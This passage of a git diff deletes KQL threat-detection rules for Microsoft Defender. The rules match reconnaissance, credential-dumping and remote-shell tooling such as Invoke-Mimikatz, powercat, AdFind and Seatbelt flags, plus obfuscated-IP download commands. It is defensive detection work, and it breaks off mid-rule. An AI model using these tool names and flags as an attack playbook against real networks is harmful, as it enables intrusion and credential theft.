"Invoke-InveighRelay" or ProcessCommandLine contains "Invoke-KrbRelay" or ProcessCommandLine contains "Invoke-LdapSignCheck" or ProcessCommandLine contains "Invoke-Lockless" or ProcessCommandLine contains "Invoke-MalSCCM" or ProcessCommandLine contains "Invoke-Mimikatz" or ProcessCommandLine contains "Invoke-Mimikittenz" or ProcessCommandLine contains "Invoke-MITM6" or ProcessCommandLine contains "Invoke-NanoDump" or ProcessCommandLine contains "Invoke-NetRipper" or ProcessCommandLine contains "Invoke-Nightmare" or ProcessCommandLine contains "Invoke-NinjaCopy" or ProcessCommandLine contains "Invoke-OfficeScrape" or ProcessCommandLine contains "Invoke-OxidResolver" or ProcessCommandLine contains "Invoke-P0wnedshell" or ProcessCommandLine contains "Invoke-Paranoia" or ProcessCommandLine contains "Invoke-PortScan" or ProcessCommandLine contains "Invoke-PoshRatHttp" or ProcessCommandLine contains "Invoke-PostExfil" or ProcessCommandLine contains "Invoke-PowerDump" or ProcessCommandLine contains "Invoke-PowerShellTCP" or ProcessCommandLine contains "Invoke-PowerShellWMI" or ProcessCommandLine contains "Invoke-PPLDump" or ProcessCommandLine contains "Invoke-PsExec" or ProcessCommandLine contains "Invoke-PSInject" or ProcessCommandLine contains "Invoke-PsUaCme" or ProcessCommandLine contains "Invoke-ReflectivePEInjection" or ProcessCommandLine contains "Invoke-ReverseDNSLookup" or ProcessCommandLine contains "Invoke-Rubeus" or ProcessCommandLine contains "Invoke-RunAs" or ProcessCommandLine contains "Invoke-SafetyKatz" or ProcessCommandLine contains "Invoke-SauronEye" or ProcessCommandLine contains "Invoke-SCShell" or ProcessCommandLine contains "Invoke-Seatbelt" or ProcessCommandLine contains "Invoke-ServiceAbuse" or ProcessCommandLine contains "Invoke-ShadowSpray" or ProcessCommandLine contains "Invoke-Sharp" or ProcessCommandLine contains "Invoke-Shellcode" or ProcessCommandLine contains "Invoke-SMBScanner" or ProcessCommandLine contains "Invoke-Snaffler" or ProcessCommandLine contains "Invoke-Spoolsample" or ProcessCommandLine contains "Invoke-SpraySinglePassword" or ProcessCommandLine contains "Invoke-SSHCommand" or ProcessCommandLine contains "Invoke-StandIn" or ProcessCommandLine contains "Invoke-StickyNotesExtract" or ProcessCommandLine contains "Invoke-SystemCommand" or ProcessCommandLine contains "Invoke-Tasksbackdoor" or ProcessCommandLine contains "Invoke-Tater" or ProcessCommandLine contains "Invoke-Thunderfox" or ProcessCommandLine contains "Invoke-ThunderStruck" or ProcessCommandLine contains "Invoke-TokenManipulation" or ProcessCommandLine contains "Invoke-Tokenvator" or ProcessCommandLine contains "Invoke-TotalExec" or ProcessCommandLine contains "Invoke-UrbanBishop" or ProcessCommandLine contains "Invoke-UserHunter" or ProcessCommandLine contains "Invoke-VoiceTroll" or ProcessCommandLine contains "Invoke-Whisker" or ProcessCommandLine contains "Invoke-WinEnum" or ProcessCommandLine contains "Invoke-winPEAS" or ProcessCommandLine contains "Invoke-WireTap" or ProcessCommandLine contains "Invoke-WmiCommand" or ProcessCommandLine contains "Invoke-WMIExec" or ProcessCommandLine contains "Invoke-WScriptBypassUAC" or ProcessCommandLine contains "Invoke-Zerologon" or ProcessCommandLine contains "MailRaider" or ProcessCommandLine contains "New-ADIDNSNode" or ProcessCommandLine contains "New-DNSRecordArray" or ProcessCommandLine contains "New-HoneyHash" or ProcessCommandLine contains "New-InMemoryModule" or ProcessCommandLine contains "New-MachineAccount" or ProcessCommandLine contains "New-SOASerialNumberArray" or ProcessCommandLine contains "Out-Minidump" or ProcessCommandLine contains "Port-Scan" or ProcessCommandLine contains "PowerBreach" or ProcessCommandLine contains "powercat " or ProcessCommandLine contains "PowerUp" or ProcessCommandLine contains "PowerView" or ProcessCommandLine contains "Remove-ADIDNSNode" or ProcessCommandLine contains "Remove-MachineAccount" or ProcessCommandLine contains "Remove-Update" or ProcessCommandLine contains "Rename-ADIDNSNode" or ProcessCommandLine contains "Revoke-ADIDNSPermission" or ProcessCommandLine contains "Set-ADIDNSNode" or ProcessCommandLine contains "Set-MacAttribute" or ProcessCommandLine contains "Set-MachineAccountAttribute" or ProcessCommandLine contains "Set-Wallpaper" or ProcessCommandLine contains "Show-TargetScreen" or ProcessCommandLine contains "Start-CaptureServer" or ProcessCommandLine contains "Start-Dnscat2" or ProcessCommandLine contains "Start-WebcamRecorder" or ProcessCommandLine contains "VolumeShadowCopyTools"
\ No newline at end of file
diff --git a/Discovery/Network_Reconnaissance_Activity.kql b/Discovery/Network_Reconnaissance_Activity.kql
deleted file mode 100644
index 511409c8..00000000
--- a/Discovery/Network_Reconnaissance_Activity.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/02/07
-// Level: high
-// Description: Detects a set of suspicious network related commands often used in recon stages
-// Tags: attack.discovery, attack.t1087, attack.t1082, car.2016-03-001
-DeviceProcessEvents
-| where ProcessCommandLine contains "nslookup" and ProcessCommandLine contains "_ldap._tcp.dc._msdcs."
\ No newline at end of file
diff --git a/Discovery/New_Network_Trace_Capture_Started_Via_Netsh.EXE.kql b/Discovery/New_Network_Trace_Capture_Started_Via_Netsh.EXE.kql
deleted file mode 100644
index fb03775e..00000000
--- a/Discovery/New_Network_Trace_Capture_Started_Via_Netsh.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Kutepov Anton, oscd.community
-// Date: 2019/10/24
-// Level: medium
-// Description: Detects the execution of netsh with the "trace" flag in order to start a network capture
-// Tags: attack.discovery, attack.credential_access, attack.t1040
-DeviceProcessEvents
-| where (ProcessCommandLine contains "trace" and ProcessCommandLine contains "start") and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe")
\ No newline at end of file
diff --git a/Discovery/Nltest.EXE_Execution.kql b/Discovery/Nltest.EXE_Execution.kql
deleted file mode 100644
index fbb98d57..00000000
--- a/Discovery/Nltest.EXE_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Arun Chauhan
-// Date: 2023/02/03
-// Level: low
-// Description: Detects nltest commands that can be used for information discovery
-// Tags: attack.discovery, attack.t1016, attack.t1018, attack.t1482
-DeviceProcessEvents
-| where FolderPath endswith "\\nltest.exe" or ProcessVersionInfoOriginalFileName =~ "nltestrk.exe"
\ No newline at end of file
diff --git a/Discovery/Obfuscated_IP_Download_Activity.kql b/Discovery/Obfuscated_IP_Download_Activity.kql
deleted file mode 100644
index 20e6fdaa..00000000
--- a/Discovery/Obfuscated_IP_Download_Activity.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems)
-// Date: 2022/08/03
-// Level: medium
-// Description: Detects use of an encoded/obfuscated version of an IP address (hex, octal...) in an URL combined with a download command
-// Tags: attack.discovery
-DeviceProcessEvents
-| where (ProcessCommandLine contains "Invoke-WebRequest" or ProcessCommandLine contains "iwr " or ProcessCommandLine contains "wget " or ProcessCommandLine contains "curl " or ProcessCommandLine contains "DownloadFile" or ProcessCommandLine contains "DownloadString") and ((ProcessCommandLine contains " 0x" or ProcessCommandLine contains "//0x" or ProcessCommandLine contains ".0x" or ProcessCommandLine contains ".00x") or (ProcessCommandLine contains "http://%" and ProcessCommandLine contains "%2e") or (ProcessCommandLine matches regex "https?://[0-9]{1,3}\\.[0-9]{1,3}\\.0[0-9]{3,4}" or ProcessCommandLine matches regex "https?://[0-9]{1,3}\\.0[0-9]{3,7}" or ProcessCommandLine matches regex "https?://0[0-9]{3,11}" or ProcessCommandLine matches regex "https?://(0[0-9]{1,11}\\.){3}0[0-9]{1,11}" or ProcessCommandLine matches regex "https?://0[0-9]{1,11}" or ProcessCommandLine matches regex " [0-7]{7,13}")) and (not(ProcessCommandLine matches regex "https?://((25[0-5]|(2[0-4]|1\\d|[1-9])?\\d)(\\.|\\b)){4}"))
\ No newline at end of file
diff --git a/Discovery/Obfuscated_IP_Via_CLI.kql b/Discovery/Obfuscated_IP_Via_CLI.kql
deleted file mode 100644
index 43d59e08..00000000
--- a/Discovery/Obfuscated_IP_Via_CLI.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)
-// Date: 2022/08/03
-// Level: medium
-// Description: Detects usage of an encoded/obfuscated version of an IP address (hex, octal, etc.) via command line
-// Tags: attack.discovery
-DeviceProcessEvents
-| where (FolderPath endswith "\\ping.exe" or FolderPath endswith "\\arp.exe") and ((ProcessCommandLine contains " 0x" or ProcessCommandLine contains "//0x" or ProcessCommandLine contains ".0x" or ProcessCommandLine contains ".00x") or (ProcessCommandLine contains "http://%" and ProcessCommandLine contains "%2e") or (ProcessCommandLine matches regex "https?://[0-9]{1,3}\\.[0-9]{1,3}\\.0[0-9]{3,4}" or ProcessCommandLine matches regex "https?://[0-9]{1,3}\\.0[0-9]{3,7}" or ProcessCommandLine matches regex "https?://0[0-9]{3,11}" or ProcessCommandLine matches regex "https?://(0[0-9]{1,11}\\.){3}0[0-9]{1,11}" or ProcessCommandLine matches regex "https?://0[0-9]{1,11}" or ProcessCommandLine matches regex " [0-7]{7,13}")) and (not(ProcessCommandLine matches regex "https?://((25[0-5]|(2[0-4]|1\\d|[1-9])?\\d)(\\.|\\b)){4}"))
\ No newline at end of file
diff --git a/Discovery/PUA_-_AdFind_Suspicious_Execution.kql b/Discovery/PUA_-_AdFind_Suspicious_Execution.kql
deleted file mode 100644
index 665b314e..00000000
--- a/Discovery/PUA_-_AdFind_Suspicious_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Janantha Marasinghe (https://github.com/blueteam0ps), FPT.EagleEye Team, omkar72, oscd.community
-// Date: 2021/02/02
-// Level: high
-// Description: Detects AdFind execution with common flags seen used during attacks
-// Tags: attack.discovery, attack.t1018, attack.t1087.002, attack.t1482, attack.t1069.002, stp.1u
-DeviceProcessEvents
-| where ProcessCommandLine contains "domainlist" or ProcessCommandLine contains "trustdmp" or ProcessCommandLine contains "dcmodes" or ProcessCommandLine contains "adinfo" or ProcessCommandLine contains " dclist " or ProcessCommandLine contains "computer_pwdnotreqd" or ProcessCommandLine contains "objectcategory=" or ProcessCommandLine contains "-subnets -f" or ProcessCommandLine contains "name=\"Domain Admins\"" or ProcessCommandLine contains "-sc u:" or ProcessCommandLine contains "domainncs" or ProcessCommandLine contains "dompol" or ProcessCommandLine contains " oudmp " or ProcessCommandLine contains "subnetdmp" or ProcessCommandLine contains "gpodmp" or ProcessCommandLine contains "fspdmp" or ProcessCommandLine contains "users_noexpire" or ProcessCommandLine contains "computers_active" or ProcessCommandLine contains "computers_pwdnotreqd"
\ No newline at end of file
diff --git a/Discovery/PUA_-_Adidnsdump_Execution.kql b/Discovery/PUA_-_Adidnsdump_Execution.kql
deleted file mode 100644
index 18f6a3fc..00000000
--- a/Discovery/PUA_-_Adidnsdump_Execution.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: frack113
-// Date: 2022/01/01
-// Level: low
-// Description: This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks Python 3 and python.exe must be installed,
-Usee to Query/modify DNS records for Active Directory integrated DNS via LDAP
-
-// Tags: attack.discovery, attack.t1018
-DeviceProcessEvents
-| where ProcessCommandLine contains "adidnsdump" and FolderPath endswith "\\python.exe"
\ No newline at end of file
diff --git a/Discovery/PUA_-_Advanced_IP_Scanner_Execution.kql b/Discovery/PUA_-_Advanced_IP_Scanner_Execution.kql
deleted file mode 100644
index 0d88a8e3..00000000
--- a/Discovery/PUA_-_Advanced_IP_Scanner_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), @ROxPinTeddy
-// Date: 2020/05/12
-// Level: medium
-// Description: Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups.
-// Tags: attack.discovery, attack.t1046, attack.t1135
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/portable" and ProcessCommandLine contains "/lng") or (FolderPath contains "\\advanced_ip_scanner" or ProcessVersionInfoOriginalFileName contains "advanced_ip_scanner" or ProcessVersionInfoFileDescription contains "Advanced IP Scanner")
\ No newline at end of file
diff --git a/Discovery/PUA_-_Advanced_Port_Scanner_Execution.kql b/Discovery/PUA_-_Advanced_Port_Scanner_Execution.kql
deleted file mode 100644
index 7d57516a..00000000
--- a/Discovery/PUA_-_Advanced_Port_Scanner_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2021/12/18
-// Level: medium
-// Description: Detects the use of Advanced Port Scanner.
-// Tags: attack.discovery, attack.t1046, attack.t1135
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/portable" and ProcessCommandLine contains "/lng") or (FolderPath contains "\\advanced_port_scanner" or ProcessVersionInfoOriginalFileName contains "advanced_port_scanner" or ProcessVersionInfoFileDescription contains "Advanced Port Scanner")
\ No newline at end of file
diff --git a/Discovery/PUA_-_Crassus_Execution.kql b/Discovery/PUA_-_Crassus_Execution.kql
deleted file mode 100644
index a6d0a8b2..00000000
--- a/Discovery/PUA_-_Crassus_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: pH-T (Nextron Systems)
-// Date: 2023/04/17
-// Level: high
-// Description: Detects Crassus, a Windows privilege escalation discovery tool, based on PE metadata characteristics.
-// Tags: attack.discovery, attack.t1590.001
-DeviceProcessEvents
-| where FolderPath endswith "\\Crassus.exe" or ProcessVersionInfoOriginalFileName =~ "Crassus.exe" or ProcessVersionInfoFileDescription contains "Crassus"
\ No newline at end of file
diff --git a/Discovery/PUA_-_Seatbelt_Execution.kql b/Discovery/PUA_-_Seatbelt_Execution.kql
deleted file mode 100644
index 4a282d83..00000000
--- a/Discovery/PUA_-_Seatbelt_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/10/18
-// Level: high
-// Description: Detects the execution of the PUA/Recon tool Seatbelt via PE information of command line parameters
-// Tags: attack.discovery, attack.t1526, attack.t1087, attack.t1083
-DeviceProcessEvents
-| where (FolderPath endswith "\\Seatbelt.exe" or ProcessVersionInfoOriginalFileName =~ "Seatbelt.exe" or ProcessVersionInfoFileDescription =~ "Seatbelt" or (ProcessCommandLine contains " DpapiMasterKeys" or ProcessCommandLine contains " InterestingProcesses" or ProcessCommandLine contains " InterestingFiles" or ProcessCommandLine contains " CertificateThumbprints" or ProcessCommandLine contains " ChromiumBookmarks" or ProcessCommandLine contains " ChromiumHistory" or ProcessCommandLine contains " ChromiumPresence" or ProcessCommandLine contains " CloudCredentials" or ProcessCommandLine contains " CredEnum" or ProcessCommandLine contains " CredGuard" or ProcessCommandLine contains " FirefoxHistory" or ProcessCommandLine contains " ProcessCreationEvents")) or ((ProcessCommandLine contains " -group=misc" or ProcessCommandLine contains " -group=remote" or ProcessCommandLine contains " -group=chromium" or ProcessCommandLine contains " -group=slack" or ProcessCommandLine contains " -group=system" or ProcessCommandLine contains " -group=user" or ProcessCommandLine contains " -group=all") and ProcessCommandLine contains " -outputfile=")
\ No newline at end of file
diff --git a/Discovery/PUA_-_SoftPerfect_Netscan_Execution.kql b/Discovery/PUA_-_SoftPerfect_Netscan_Execution.kql
deleted file mode 100644
index 66385a3e..00000000
--- a/Discovery/PUA_-_SoftPerfect_Netscan_Execution.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: @d4ns4n_ (Wuerth-Phoenix)
-// Date: 2024/04/25
-// Level: medium
-// Description: Detects usage of SoftPerfect's "netscan.exe". An application for scanning networks.
-It is actively used in-the-wild by threat actors to inspect and understand the network architecture of a victim.
-
-// Tags: attack.discovery, attack.t1046
-DeviceProcessEvents
-| where FolderPath endswith "\\netscan.exe" or ProcessVersionInfoProductName =~ "Network Scanner" or ProcessVersionInfoFileDescription =~ "Application for scanning networks"
\ No newline at end of file
diff --git a/Discovery/PUA_-_Suspicious_ActiveDirectory_Enumeration_Via_AdFind.EXE.kql b/Discovery/PUA_-_Suspicious_ActiveDirectory_Enumeration_Via_AdFind.EXE.kql
deleted file mode 100644
index 14d15c3a..00000000
--- a/Discovery/PUA_-_Suspicious_ActiveDirectory_Enumeration_Via_AdFind.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/12/13
-// Level: high
-// Description: Detects active directory enumeration activity using known AdFind CLI flags
-// Tags: attack.discovery, attack.t1087.002
-DeviceProcessEvents
-| where ProcessCommandLine contains "-sc admincountdmp" or ProcessCommandLine contains "-sc exchaddresses" or (ProcessCommandLine contains "lockoutduration" or ProcessCommandLine contains "lockoutthreshold" or ProcessCommandLine contains "lockoutobservationwindow" or ProcessCommandLine contains "maxpwdage" or ProcessCommandLine contains "minpwdage" or ProcessCommandLine contains "minpwdlength" or ProcessCommandLine contains "pwdhistorylength" or ProcessCommandLine contains "pwdproperties")
\ No newline at end of file
diff --git a/Discovery/Permission_Check_Via_Accesschk.EXE.kql b/Discovery/Permission_Check_Via_Accesschk.EXE.kql
deleted file mode 100644
index 7b93caa8..00000000
--- a/Discovery/Permission_Check_Via_Accesschk.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Teymur Kheirkhabarov (idea), Mangatas Tondang, oscd.community, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2020/10/13
-// Level: medium
-// Description: Detects the usage of the "Accesschk" utility, an access and privilege audit tool developed by SysInternal and often being abused by attacker to verify process privileges
-// Tags: attack.discovery, attack.t1069.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "uwcqv " or ProcessCommandLine contains "kwsu " or ProcessCommandLine contains "qwsu " or ProcessCommandLine contains "uwdqs ") and (ProcessVersionInfoProductName endswith "AccessChk" or ProcessVersionInfoFileDescription contains "Reports effective permissions" or (FolderPath endswith "\\accesschk.exe" or FolderPath endswith "\\accesschk64.exe") or ProcessVersionInfoOriginalFileName =~ "accesschk.exe")
\ No newline at end of file
diff --git a/Discovery/Potential_Active_Directory_Enumeration_Using_AD_Module_-_ProcCreation.kql b/Discovery/Potential_Active_Directory_Enumeration_Using_AD_Module_-_ProcCreation.kql
deleted file mode 100644
index 3f12168b..00000000
--- a/Discovery/Potential_Active_Directory_Enumeration_Using_AD_Module_-_ProcCreation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2023/01/22
-// Level: medium
-// Description: Detects usage of the "Import-Module" cmdlet to load the "Microsoft.ActiveDirectory.Management.dl" DLL. Which is often used by attackers to perform AD enumeration.
-// Tags: attack.reconnaissance, attack.discovery, attack.impact
-DeviceProcessEvents
-| where (ProcessCommandLine contains "Import-Module " or ProcessCommandLine contains "ipmo ") and ProcessCommandLine contains "Microsoft.ActiveDirectory.Management.dll" and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/Discovery/Potential_Configuration_And_Service_Reconnaissance_Via_Reg.EXE.kql b/Discovery/Potential_Configuration_And_Service_Reconnaissance_Via_Reg.EXE.kql
deleted file mode 100644
index d61c3ee0..00000000
--- a/Discovery/Potential_Configuration_And_Service_Reconnaissance_Via_Reg.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Timur Zinniatullin, oscd.community
-// Date: 2019/10/21
-// Level: medium
-// Description: Detects the usage of "reg.exe" in order to query reconnaissance information from the registry. Adversaries may interact with the Windows registry to gather information about credentials, the system, configuration, and installed software.
-// Tags: attack.discovery, attack.t1012, attack.t1007
-DeviceProcessEvents
-| where ProcessCommandLine contains "query" and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe") and (ProcessCommandLine contains "currentVersion\\windows" or ProcessCommandLine contains "winlogon\\" or ProcessCommandLine contains "currentVersion\\shellServiceObjectDelayLoad" or ProcessCommandLine contains "currentVersion\\run" or ProcessCommandLine contains "currentVersion\\policies\\explorer\\run" or ProcessCommandLine contains "currentcontrolset\\services")
\ No newline at end of file
diff --git a/Discovery/Potential_Discovery_Activity_Via_Dnscmd.EXE.kql b/Discovery/Potential_Discovery_Activity_Via_Dnscmd.EXE.kql
deleted file mode 100644
index 0f2eb648..00000000
--- a/Discovery/Potential_Discovery_Activity_Via_Dnscmd.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: @gott_cyber
-// Date: 2022/07/31
-// Level: medium
-// Description: Detects an attempt to leverage dnscmd.exe to enumerate the DNS zones of a domain. DNS zones used to host the DNS records for a particular domain.
-// Tags: attack.discovery, attack.execution, attack.t1543.003
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/enumrecords" or ProcessCommandLine contains "/enumzones" or ProcessCommandLine contains "/ZonePrint" or ProcessCommandLine contains "/info") and FolderPath endswith "\\dnscmd.exe"
\ No newline at end of file
diff --git a/Discovery/Potential_Network_Sniffing_Activity_Using_Network_Tools.kql b/Discovery/Potential_Network_Sniffing_Activity_Using_Network_Tools.kql
deleted file mode 100644
index a9505cd1..00000000
--- a/Discovery/Potential_Network_Sniffing_Activity_Using_Network_Tools.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Timur Zinniatullin, oscd.community, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2019/10/21
-// Level: medium
-// Description: Detects potential network sniffing via use of network tools such as "tshark", "windump".
-Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection.
-An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
-
-// Tags: attack.credential_access, attack.discovery, attack.t1040
-DeviceProcessEvents
-| where (ProcessCommandLine contains "-i" and FolderPath endswith "\\tshark.exe") or FolderPath endswith "\\windump.exe"
\ No newline at end of file
diff --git a/Discovery/Potential_Recon_Activity_Using_DriverQuery.EXE.kql b/Discovery/Potential_Recon_Activity_Using_DriverQuery.EXE.kql
deleted file mode 100644
index 830e114d..00000000
--- a/Discovery/Potential_Recon_Activity_Using_DriverQuery.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/01/19
-// Level: high
-// Description: Detect usage of the "driverquery" utility to perform reconnaissance on installed drivers
-// Tags: attack.discovery
-DeviceProcessEvents
-| where (FolderPath endswith "driverquery.exe" or ProcessVersionInfoOriginalFileName =~ "drvqry.exe") and ((InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe") or (InitiatingProcessFolderPath contains "\\AppData\\Local\\" or InitiatingProcessFolderPath contains "\\Users\\Public\\" or InitiatingProcessFolderPath contains "\\Windows\\Temp\\"))
\ No newline at end of file
diff --git a/Discovery/Potential_Recon_Activity_Via_Nltest.EXE.kql b/Discovery/Potential_Recon_Activity_Via_Nltest.EXE.kql
deleted file mode 100644
index 97fbb117..00000000
--- a/Discovery/Potential_Recon_Activity_Via_Nltest.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Craig Young, oscd.community, Georg Lauenstein
-// Date: 2021/07/24
-// Level: medium
-// Description: Detects nltest commands that can be used for information discovery
-// Tags: attack.discovery, attack.t1016, attack.t1482
-DeviceProcessEvents
-| where (FolderPath endswith "\\nltest.exe" or ProcessVersionInfoOriginalFileName =~ "nltestrk.exe") and ((ProcessCommandLine contains "server" and ProcessCommandLine contains "query") or (ProcessCommandLine contains "/user" or ProcessCommandLine contains "all_trusts" or ProcessCommandLine contains "dclist:" or ProcessCommandLine contains "dnsgetdc:" or ProcessCommandLine contains "domain_trusts" or ProcessCommandLine contains "dsgetdc:" or ProcessCommandLine contains "parentdomain" or ProcessCommandLine contains "trusted_domains"))
\ No newline at end of file
diff --git a/Discovery/Potential_Reconnaissance_Activity_Via_GatherNetworkInfo.VBS.kql b/Discovery/Potential_Reconnaissance_Activity_Via_GatherNetworkInfo.VBS.kql
deleted file mode 100644
index 439202c1..00000000
--- a/Discovery/Potential_Reconnaissance_Activity_Via_GatherNetworkInfo.VBS.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: blueteamer8699
-// Date: 2022/01/03
-// Level: medium
-// Description: Detects execution of the built-in script located in "C:\Windows\System32\gatherNetworkInfo.vbs". Which can be used to gather information about the target machine
-// Tags: attack.discovery, attack.execution, attack.t1615, attack.t1059.005
-DeviceProcessEvents
-| where ProcessCommandLine contains "gatherNetworkInfo.vbs" and ((FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\wscript.exe") or (ProcessVersionInfoOriginalFileName in~ ("cscript.exe", "wscript.exe")))
\ No newline at end of file
diff --git a/Discovery/Potential_Suspicious_Activity_Using_SeCEdit.kql b/Discovery/Potential_Suspicious_Activity_Using_SeCEdit.kql
deleted file mode 100644
index e8d18e0e..00000000
--- a/Discovery/Potential_Suspicious_Activity_Using_SeCEdit.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Janantha Marasinghe
-// Date: 2022/11/18
-// Level: medium
-// Description: Detects potential suspicious behaviour using secedit.exe. Such as exporting or modifying the security policy
-// Tags: attack.discovery, attack.persistence, attack.defense_evasion, attack.credential_access, attack.privilege_escalation, attack.t1562.002, attack.t1547.001, attack.t1505.005, attack.t1556.002, attack.t1562, attack.t1574.007, attack.t1564.002, attack.t1546.008, attack.t1546.007, attack.t1547.014, attack.t1547.010, attack.t1547.002, attack.t1557, attack.t1082
-DeviceProcessEvents
-| where (FolderPath endswith "\\secedit.exe" or ProcessVersionInfoOriginalFileName =~ "SeCEdit") and ((ProcessCommandLine contains "/configure" and ProcessCommandLine contains "/db") or (ProcessCommandLine contains "/export" and ProcessCommandLine contains "/cfg"))
\ No newline at end of file
diff --git a/Discovery/Potentially_Suspicious_EventLog_Recon_Activity_Using_Log_Query_Utilities.kql b/Discovery/Potentially_Suspicious_EventLog_Recon_Activity_Using_Log_Query_Utilities.kql
deleted file mode 100644
index 5a9213f4..00000000
--- a/Discovery/Potentially_Suspicious_EventLog_Recon_Activity_Using_Log_Query_Utilities.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)
-// Date: 2022/09/09
-// Level: medium
-// Description: Detects execution of different log query utilities and commands to search and dump the content of specific event logs or look for specific event IDs.
-This technique is used by threat actors in order to extract sensitive information from events logs such as usernames, IP addresses, hostnames, etc.
-
-// Tags: attack.credential_access, attack.discovery, attack.t1552
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "-InstanceId 4624" or ProcessCommandLine contains "System[EventID=4624]" or (ProcessCommandLine contains "EventCode=" and ProcessCommandLine contains "4624") or (ProcessCommandLine contains "EventIdentifier=" and ProcessCommandLine contains "4624") or ProcessCommandLine contains "-InstanceId 4778" or ProcessCommandLine contains "System[EventID=4778]" or (ProcessCommandLine contains "EventCode=" and ProcessCommandLine contains "4778") or (ProcessCommandLine contains "EventIdentifier=" and ProcessCommandLine contains "4778") or ProcessCommandLine contains "-InstanceId 25" or ProcessCommandLine contains "System[EventID=25]" or (ProcessCommandLine contains "EventCode=" and ProcessCommandLine contains "25") or (ProcessCommandLine contains "EventIdentifier=" and ProcessCommandLine contains "25")) or (ProcessCommandLine contains "Microsoft-Windows-TerminalServices-LocalSessionManager/Operational" or ProcessCommandLine contains "Microsoft-Windows-Terminal-Services-RemoteConnectionManager/Operational" or ProcessCommandLine contains "Security")) and ((ProcessCommandLine contains "Select" and ProcessCommandLine contains "Win32_NTLogEvent") or ((ProcessCommandLine contains " qe " or ProcessCommandLine contains " query-events ") and (FolderPath endswith "\\wevtutil.exe" or ProcessVersionInfoOriginalFileName =~ "wevtutil.exe")) or (ProcessCommandLine contains " ntevent" and (FolderPath endswith "\\wmic.exe" 
or ProcessVersionInfoOriginalFileName =~ "wmic.exe")) or (ProcessCommandLine contains "Get-WinEvent " or ProcessCommandLine contains "get-eventlog "))
\ No newline at end of file
diff --git a/Discovery/Python_Initiated_Connection.kql b/Discovery/Python_Initiated_Connection.kql
deleted file mode 100644
index 73ccfb59..00000000
--- a/Discovery/Python_Initiated_Connection.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/12/10
-// Level: medium
-// Description: Detects a Python process initiating a network connection. While this often relates to package installation, it can also indicate a potential malicious script communicating with a C&C server.
-// Tags: attack.discovery, attack.t1046
-DeviceNetworkEvents
-| where InitiatingProcessFolderPath contains "python" and (not((RemoteIP =~ "127.0.0.1" and LocalIP =~ "127.0.0.1"))) and (not((((InitiatingProcessCommandLine contains ":\\ProgramData\\Anaconda3\\Scripts\\conda-script.py" and InitiatingProcessCommandLine contains "update") and InitiatingProcessParentFileName =~ "conda.exe") or (InitiatingProcessCommandLine contains "C:\\ProgramData\\Anaconda3\\Scripts\\jupyter-notebook-script.py" and InitiatingProcessParentFileName =~ "python.exe"))))
\ No newline at end of file
diff --git a/Discovery/Recon_Command_Output_Piped_To_Findstr.EXE.kql b/Discovery/Recon_Command_Output_Piped_To_Findstr.EXE.kql
deleted file mode 100644
index 2a95db99..00000000
--- a/Discovery/Recon_Command_Output_Piped_To_Findstr.EXE.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), frack113
-// Date: 2023/07/06
-// Level: medium
-// Description: Detects the excution of a potential recon command where the results are piped to "findstr". This is meant to trigger on inline calls of "cmd.exe" via the "/c" or "/k" for example. Attackers often time use this to extract specific information they require in their chain.
-
